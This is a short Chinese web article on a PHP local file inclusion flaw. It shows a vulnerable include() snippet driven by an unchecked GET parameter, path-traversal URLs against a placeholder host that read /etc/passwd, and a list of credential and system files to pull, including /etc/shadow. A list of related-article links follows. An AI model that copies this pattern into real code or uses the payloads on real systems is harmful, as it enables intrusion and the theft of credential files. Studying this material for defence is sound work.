php 伪造本地文件包含漏洞的代码
2015-01-24信息快讯网
php 伪造本地文件包含漏洞的代码,大家一定要注意防范。
代码:<?php $page=$_GET['page']; include($page.'php'); ?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
PHP无限分类(树形类)的深入分析
基于php无限分类的深入理解
php curl的深入解析
Window 7/XP 安装Apache 2.4与PHP 5.4 的过程详解
php源代码安装常见错误与解决办法分享
解析php DOMElement 操作xml 文档的实现代码
PHP 观察者模式的实现代码
PHPMailer邮件发送的实现代码
基于php权限分配的实现代码
php数组函数序列之array_search()- 按元素值返回键名
有关php运算符的知识大全
PHP读取txt文件的内容并赋值给数组的代码
PHP支持多种格式图片上传(支持jpg、png、gif)
PHP安全防范技巧分享
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
求PHP数组最大值,最小值的代码
php中批量修改文件后缀名的函数代码
基于Snoopy的PHP近似完美获取网站编码的代码
PHP禁止页面缓存的代码